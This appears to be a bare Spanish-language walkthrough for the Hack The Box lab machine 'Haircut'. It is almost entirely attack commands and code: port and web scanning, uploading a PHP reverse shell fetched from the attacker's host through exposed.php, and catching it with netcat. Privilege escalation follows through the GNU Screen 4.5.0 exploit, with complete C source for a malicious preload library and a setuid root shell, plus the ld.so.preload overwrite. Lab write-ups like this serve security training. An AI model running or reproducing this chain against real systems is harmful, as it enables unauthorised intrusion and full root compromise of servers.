nmap -A -p- -oA output 10.129.95.174 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA haircut 10.129.95.174

nmap -sU -O -p- -oA haircut-udp 10.129.95.174

nikto -h 10.129.95.174:80

nmap --script http-enum -p80 10.129.95.174 -oN webScan -Pn

wfuzz -c hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://10.129.95.174/FUZZ"

Encontramos el directorio /uploads

Creamos un archivo extensions.txt con php,html y txt

wfuzz -c hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -w extensions.txt http://10.129.95.174/FUZZ.FUZ2Z

http://10.129.95.174/exposed.php

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php cu3rv0x.php

Cambiamos el puerto y la ip

python3 -m http.server 80

http://10.10.14.125/cu3rv0x.php -o uploads/cuerv0x.php

nc -lvnp 443

searchsploit screen 4.5

searchsploit -m 41154

![[Pasted image 20220122180431.png]]

cd /

find / -perm -4000 -o -perm -2000 -type f 2>/dev/null

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

Creamos un archivo rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

gcc -o /tmp/rootshell /tmp/rootshell.c

cd /tmp

python3 -m http.server 8888

wget http://10.129.95.174/rootshell

wget http://10.129.95.174/libhax.so

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
id
/tmp/rootshell